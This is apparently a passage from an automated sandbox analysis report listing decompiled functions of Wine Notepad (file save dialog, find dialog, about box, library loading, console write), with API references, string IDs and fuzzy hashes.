                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Heap$AllocCloseCreateHandleNameOpenProcessReadSizelstrcpy
                                                                                              • String ID: *.txt$txt
                                                                                              • API String ID: 3026662107-571010898
                                                                                              • Opcode ID: e2689d4b2775300c3cf07d57e22a08c43992e0cb96f0f59285c8c489e7d05f21
                                                                                              • Instruction ID: 856d632607de526e9fee03334b494c4d90c2fa354a5df4620f3a5a3ba4d09bf0
                                                                                              • Opcode Fuzzy Hash: e2689d4b2775300c3cf07d57e22a08c43992e0cb96f0f59285c8c489e7d05f21
                                                                                              • Instruction Fuzzy Hash: F41127B18193819BD760CF14D94875BBFF8BBD9708F009A1DF8C896254D7BA9588CF82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01351A30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 75%
                                                                                              			E01351A30() {
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v552;
				intOrPtr _v560;
				intOrPtr _v580;
				WCHAR* _v584;
				intOrPtr _v600;
				intOrPtr _v604;
				struct tagOFNA _v608;
				struct tagOFNA _t16;
				intOrPtr _t17;
				WCHAR* _t24;
				struct tagOFNA* _t25;

				_t25 =  &_v608;
				asm("xorps xmm0, xmm0");
				asm("movups [esp+0x10], xmm0");
				asm("movups [esp+0x20], xmm0");
				asm("movups [esp+0x30], xmm0");
				asm("movups [esp+0x40], xmm0");
				_v528 = 0;
				_v532 = 0;
				_t24 =  &_v524;
				lstrcpyW(_t24, L"*.txt");
				 *_t25 = 0x58;
				_t16 =  *0x139ebd0; // 0x0
				_v608 = _t16;
				_t17 =  *0x139ebcc; // 0x0
				_v604 = _t17;
				_v600 = 0x139f470;
				_v584 = _t24;
				_v580 = 0;
				_v560 = 0x880866;
				_v544 = E01351870;
				_v540 = 0x190;
				_v552 = L"txt";
				 *0x139f934 =  *0x139f46c;
				 *0x139f938 = 0;
				return 0 | GetSaveFileNameW(_t25) != 0x00000000;
			}



















                                                                                              0x01351a31
                                                                                              0x01351a37
                                                                                              0x01351a3a
                                                                                              0x01351a3f
                                                                                              0x01351a44
                                                                                              0x01351a49
                                                                                              0x01351a4e
                                                                                              0x01351a56
                                                                                              0x01351a5e
                                                                                              0x01351a68
                                                                                              0x01351a6e
                                                                                              0x01351a75
                                                                                              0x01351a7a
                                                                                              0x01351a7e
                                                                                              0x01351a83
                                                                                              0x01351a87
                                                                                              0x01351a8f
                                                                                              0x01351a93
                                                                                              0x01351a9b
                                                                                              0x01351aa3
                                                                                              0x01351aab
                                                                                              0x01351ab3
                                                                                              0x01351ac0
                                                                                              0x01351ac5
                                                                                              0x01351ae8

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileNameSavelstrcpy
                                                                                              • String ID: *.txt$txt
                                                                                              • API String ID: 4227682130-571010898
                                                                                              • Opcode ID: cdc92bfc369a8c4bc78a9145291fc707a497271071b8aadec02e4028ca380de6
                                                                                              • Instruction ID: b87995f8d8331a27eeffdfcd5702417c1384fd5c0b5b87f6ff60ca44330033f1
                                                                                              • Opcode Fuzzy Hash: cdc92bfc369a8c4bc78a9145291fc707a497271071b8aadec02e4028ca380de6
                                                                                              • Instruction Fuzzy Hash: 3A1139B19093819BD350CF18D55835BBBF8BB89308F009A1EF8C896250D3BA9588CF82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01352898 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E01352898(void* __eax, void* __ebx) {

				return __eax;
			}



                                                                                              0x00000000

                                                                                              APIs
                                                                                              • SetActiveWindow.USER32(00000000), ref: 013528A4
                                                                                              • FindTextW.COMDLG32(0139FD68), ref: 013528F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ActiveFindTextWindow
                                                                                              • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                                                              • API String ID: 1462590097-3286657855
                                                                                              • Opcode ID: f972a8fdac0b429b7c90d3161e2a1d8ae366ec5a45d72ec1f68526b5f2b8ba8b
                                                                                              • Instruction ID: c9752ad15a7b388186ebde2e72b8e73d7d958efe84f66ac777536904e5b1480c
                                                                                              • Opcode Fuzzy Hash: f972a8fdac0b429b7c90d3161e2a1d8ae366ec5a45d72ec1f68526b5f2b8ba8b
                                                                                              • Instruction Fuzzy Hash: 7CF0F4B5A40701DAEB71DF6AE888A153FFCAB98709F144169E819D624CE7B38184CF11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013824CC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E013824CC(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E01368845(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                                                                              0x013824d9
                                                                                              0x013824e1
                                                                                              0x01382516
                                                                                              0x013824e3
                                                                                              0x013824ec
                                                                                              0x00000000
                                                                                              0x01382513
                                                                                              0x01382512
                                                                                              0x01382512

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,01382678,00000000,?,013A0B48,?,?,?,0138249F,00000004,InitializeCriticalSectionEx,01395C44,01395C4C), ref: 013824D9
                                                                                              • GetLastError.KERNEL32(?,01382678,00000000,?,013A0B48,?,?,?,0138249F,00000004,InitializeCriticalSectionEx,01395C44,01395C4C,00000000,?,013621D2), ref: 013824E3
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0138250B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3177248105-2084034818
                                                                                              • Opcode ID: 75f965290aec50f0119d646beece921c47af0dc5a84ec30568e32a61ad46237a
                                                                                              • Instruction ID: 1b0250a9ec5217ad3919aa290b2fbfdb9fc0fae3149c4e79d09a9680b40b2a8d
                                                                                              • Opcode Fuzzy Hash: 75f965290aec50f0119d646beece921c47af0dc5a84ec30568e32a61ad46237a
                                                                                              • Instruction Fuzzy Hash: C9E01A31380309F6EF212BA5FC56B6D7E98AB00B58F244020FA0DA80D5D762E6208A65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01352805 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 86%
                                                                                              			E01352805(struct HWND__* __eax) {
				intOrPtr _t2;
				intOrPtr _t3;
				void* _t4;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				if(__eax == 0) {
					asm("xorps xmm0, xmm0");
					asm("movups [0x139fd7c], xmm0");
					 *0x139fd8c = 0;
					 *0x139fd68 = 0x28;
					_t2 =  *0x139ebd0; // 0x0
					 *0x139fd6c = _t2;
					_t3 =  *0x139ebcc; // 0x0
					 *0x139fd70 = _t3;
					 *0x139fd78 = 0x139ec4c;
					 *0x139fd74 = 0x10001;
					_t4 = FindTextW(0x139fd68);
					 *0x139ebd4 = _t4;
					__eflags = _t4;
					if(__eflags == 0) {
						return E01358D4E(_t7, _t8, _t9, _t10, __eflags, L"Globals.hFindReplaceDlg != 0", L"main.c", 0x541);
					} else {
						return _t4;
					}
				} else {
					return SetActiveWindow(__eax);
				}
			}










                                                                                              0x01352807
                                                                                              0x01352811
                                                                                              0x01352814
                                                                                              0x0135281b
                                                                                              0x01352825
                                                                                              0x0135282f
                                                                                              0x01352834
                                                                                              0x01352839
                                                                                              0x0135283e
                                                                                              0x01352843
                                                                                              0x0135284d
                                                                                              0x0135285c
                                                                                              0x01352862
                                                                                              0x01352867
                                                                                              0x01352869
                                                                                              0x01352883
                                                                                              0x0135286b
                                                                                              0x0135286b
                                                                                              0x0135286b
                                                                                              0x01352809
                                                                                              0x01352810
                                                                                              0x01352810

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ActiveFindTextWindow
                                                                                              • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                                                              • API String ID: 1462590097-3286657855
                                                                                              • Opcode ID: a808ff04772f7a50f901450e7a240564c42ec0cd91a467615824d397665b74a6
                                                                                              • Instruction ID: be40dcee8bd054bb0a28f19735f1d47907806e21688c47c9f3795658fbb42cb8
                                                                                              • Opcode Fuzzy Hash: a808ff04772f7a50f901450e7a240564c42ec0cd91a467615824d397665b74a6
                                                                                              • Instruction Fuzzy Hash: 0FF03AB5940701DAEF70DF6AE848A113FBCBB98709F504169E855D628CE7B79184CF11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013529E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 18%
                                                                                              			E013529E0() {
				char _v518;
				intOrPtr _v524;
				struct HINSTANCE__* _t3;
				void* _t4;
				short* _t7;
				void* _t9;

				_t3 =  *0x139ebcc; // 0x0
				asm("movaps xmm0, [0x1394140]");
				asm("movups [esp+0x4], xmm0");
				 *(_t9 - 0x18) = _t3;
				_v524 = 0x8000;
				_t4 = LoadImageW(??, ??, ??, ??, ??, ??);
				_t7 =  &_v518;
				LoadStringW( *0x139ebcc, 0x170, _t7, 0);
				return ShellAboutW( *0x139ebd0, _t7, L"Wine Notepad", _t4);
			}









                                                                                              0x013529e8
                                                                                              0x013529f0
                                                                                              0x013529f7
                                                                                              0x013529fc
                                                                                              0x013529ff
                                                                                              0x01352a07
                                                                                              0x01352a0f
                                                                                              0x01352a21
                                                                                              0x01352a42

                                                                                              APIs
                                                                                              • LoadImageW.USER32 ref: 01352A07
                                                                                              • LoadStringW.USER32(00000170,?,00000000), ref: 01352A21
                                                                                              • ShellAboutW.SHELL32(?,Wine Notepad,00000000), ref: 01352A34
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$AboutImageShellString
                                                                                              • String ID: Wine Notepad
                                                                                              • API String ID: 2733739231-3086428749
                                                                                              • Opcode ID: 9c7ba699d0911ad97679aab21443e66431b2987d0a75cf6863ea85affd13e166
                                                                                              • Instruction ID: d21193e2083ad4c12230ca237b1bc590b0dd3379756bc560fc627e232012de61
                                                                                              • Opcode Fuzzy Hash: 9c7ba699d0911ad97679aab21443e66431b2987d0a75cf6863ea85affd13e166
                                                                                              • Instruction Fuzzy Hash: 28F0A731508300EBD331AB69FD0DF977F78FBC5704F004528F44956158D6311454CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01384A61 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E01384A61(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				signed int _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				signed char* _t190;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				signed int _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed char* _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				void* _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(0x139366e);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x139e210; // 0xbb40e64e
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x13a0da0 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_v116 = GetConsoleOutputCP();
				if( *((char*)(_t265 + 0x14)) == 0) {
					E01371420(_t265, _t291);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x13a0da0 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							if(( *(_t300 + _t273 + 0x2d) & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc)))) + ( *_t292 & 0x000000ff) * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x13a0da0 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x13a0da0 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E0138869E(_t273, _t292,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *(_t300 + _t273 + 0x2d) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E0138869E(_t273, _t292);
								_t316 = _t315 + 0x10;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x139e980; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								if(_t281 > _t302) {
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x13a0da0 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = L01389E23( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x139e980)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x13a0da0 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E013547B0( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x13a0da0 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = L01389E23( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E0136F1C0(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return L01353E0D(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}

















































































                                                                                              0x01384a66
                                                                                              0x01384a68
                                                                                              0x01384a73
                                                                                              0x01384a74
                                                                                              0x01384a77
                                                                                              0x01384a7c
                                                                                              0x01384a7e
                                                                                              0x01384a84
                                                                                              0x01384a88
                                                                                              0x01384a8e
                                                                                              0x01384a93
                                                                                              0x01384a99
                                                                                              0x01384a9c
                                                                                              0x01384a9f
                                                                                              0x01384aa2
                                                                                              0x01384aa5
                                                                                              0x01384aa8
                                                                                              0x01384ab2
                                                                                              0x01384ab9
                                                                                              0x01384ac1
                                                                                              0x01384ace
                                                                                              0x01384ad1
                                                                                              0x01384ad5
                                                                                              0x01384ad5
                                                                                              0x01384add
                                                                                              0x01384ae5
                                                                                              0x01384aea
                                                                                              0x01384aeb
                                                                                              0x01384aec
                                                                                              0x01384aed
                                                                                              0x01384af0
                                                                                              0x01384af2
                                                                                              0x01384af8
                                                                                              0x01384afe
                                                                                              0x01384b01
                                                                                              0x01384b03
                                                                                              0x01384b06
                                                                                              0x01384b0f
                                                                                              0x01384b15
                                                                                              0x01384b18
                                                                                              0x01384b1f
                                                                                              0x01384b26
                                                                                              0x01384b29
                                                                                              0x01384c6a
                                                                                              0x01384c8d
                                                                                              0x01384c99
                                                                                              0x01384cca
                                                                                              0x01384ccd
                                                                                              0x01384ccf
                                                                                              0x00000000
                                                                                              0x01384c9b
                                                                                              0x01384c9b
                                                                                              0x01384c9e
                                                                                              0x01384ca4
                                                                                              0x01384dee
                                                                                              0x01384dfc
                                                                                              0x01384e05
                                                                                              0x01384caa
                                                                                              0x01384cb4
                                                                                              0x01384cb9
                                                                                              0x01384cbf
                                                                                              0x01384cc5
                                                                                              0x00000000
                                                                                              0x01384cc5
                                                                                              0x01384cbf
                                                                                              0x01384ca4
                                                                                              0x01384c6c
                                                                                              0x01384c73
                                                                                              0x01384c76
                                                                                              0x01384c79
                                                                                              0x01384c7b
                                                                                              0x01384c7e
                                                                                              0x01384c85
                                                                                              0x01384c87
                                                                                              0x01384cd0
                                                                                              0x01384cd3
                                                                                              0x01384cd4
                                                                                              0x01384cd9
                                                                                              0x01384cdf
                                                                                              0x01384ce5
                                                                                              0x00000000
                                                                                              0x01384ce5
                                                                                              0x01384cdf
                                                                                              0x01384b2f
                                                                                              0x01384b32
                                                                                              0x01384b34
                                                                                              0x01384b36
                                                                                              0x01384b3a
                                                                                              0x01384b3b
                                                                                              0x01384b3f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01384b3f
                                                                                              0x01384b44
                                                                                              0x01384b46
                                                                                              0x01384b4b
                                                                                              0x01384c0b
                                                                                              0x01384c12
                                                                                              0x01384c13
                                                                                              0x01384c18
                                                                                              0x01384dca
                                                                                              0x00000000
                                                                                              0x01384dcc
                                                                                              0x01384dcc
                                                                                              0x01384dcf
                                                                                              0x01384dde
                                                                                              0x01384de2
                                                                                              0x01384de3
                                                                                              0x00000000
                                                                                              0x01384de7
                                                                                              0x00000000
                                                                                              0x01384c1e
                                                                                              0x01384c23
                                                                                              0x01384c29
                                                                                              0x01384c2f
                                                                                              0x01384c38
                                                                                              0x01384c43
                                                                                              0x01384c48
                                                                                              0x01384c4e
                                                                                              0x01384c57
                                                                                              0x01384c5a
                                                                                              0x00000000
                                                                                              0x01384c5a
                                                                                              0x01384c4e
                                                                                              0x01384b51
                                                                                              0x01384b54
                                                                                              0x01384b5a
                                                                                              0x01384b5c
                                                                                              0x01384b69
                                                                                              0x01384b6a
                                                                                              0x01384b6d
                                                                                              0x01384b70
                                                                                              0x01384b75
                                                                                              0x01384d9b
                                                                                              0x01384d9d
                                                                                              0x01384da0
                                                                                              0x01384da3
                                                                                              0x01384daf
                                                                                              0x01384db2
                                                                                              0x01384db4
                                                                                              0x01384db5
                                                                                              0x01384db9
                                                                                              0x01384dbc
                                                                                              0x01384dc0
                                                                                              0x01384dc0
                                                                                              0x01384dc0
                                                                                              0x01384dc3
                                                                                              0x01384dc3
                                                                                              0x01384b7b
                                                                                              0x01384b7b
                                                                                              0x01384b7e
                                                                                              0x01384b80
                                                                                              0x01384b83
                                                                                              0x01384b85
                                                                                              0x01384b89
                                                                                              0x01384b8a
                                                                                              0x01384b8b
                                                                                              0x01384b8f
                                                                                              0x01384b94
                                                                                              0x01384b9e
                                                                                              0x01384ba3
                                                                                              0x01384ba6
                                                                                              0x01384ba6
                                                                                              0x01384ba9
                                                                                              0x01384bac
                                                                                              0x01384bae
                                                                                              0x01384bb1
                                                                                              0x01384bba
                                                                                              0x01384bbe
                                                                                              0x01384bbf
                                                                                              0x01384bc6
                                                                                              0x01384bcc
                                                                                              0x01384bd4
                                                                                              0x01384bdf
                                                                                              0x01384be4
                                                                                              0x01384bef
                                                                                              0x01384bf4
                                                                                              0x01384bfa
                                                                                              0x01384c03
                                                                                              0x01384c5d
                                                                                              0x01384c5d
                                                                                              0x01384ce8
                                                                                              0x01384ced
                                                                                              0x01384cff
                                                                                              0x01384d04
                                                                                              0x01384d07
                                                                                              0x01384d0c
                                                                                              0x01384d27
                                                                                              0x01384e0a
                                                                                              0x01384e10
                                                                                              0x01384d2d
                                                                                              0x01384d2d
                                                                                              0x01384d38
                                                                                              0x01384d3a
                                                                                              0x01384d3d
                                                                                              0x01384d46
                                                                                              0x01384d50
                                                                                              0x00000000
                                                                                              0x01384d52
                                                                                              0x01384d54
                                                                                              0x01384d56
                                                                                              0x01384d6f
                                                                                              0x00000000
                                                                                              0x01384d75
                                                                                              0x01384d79
                                                                                              0x01384d7f
                                                                                              0x01384d82
                                                                                              0x01384d88
                                                                                              0x01384d8b
                                                                                              0x00000000
                                                                                              0x01384d8b
                                                                                              0x01384d79
                                                                                              0x01384d6f
                                                                                              0x01384d50
                                                                                              0x01384d46
                                                                                              0x01384d27
                                                                                              0x01384d0c
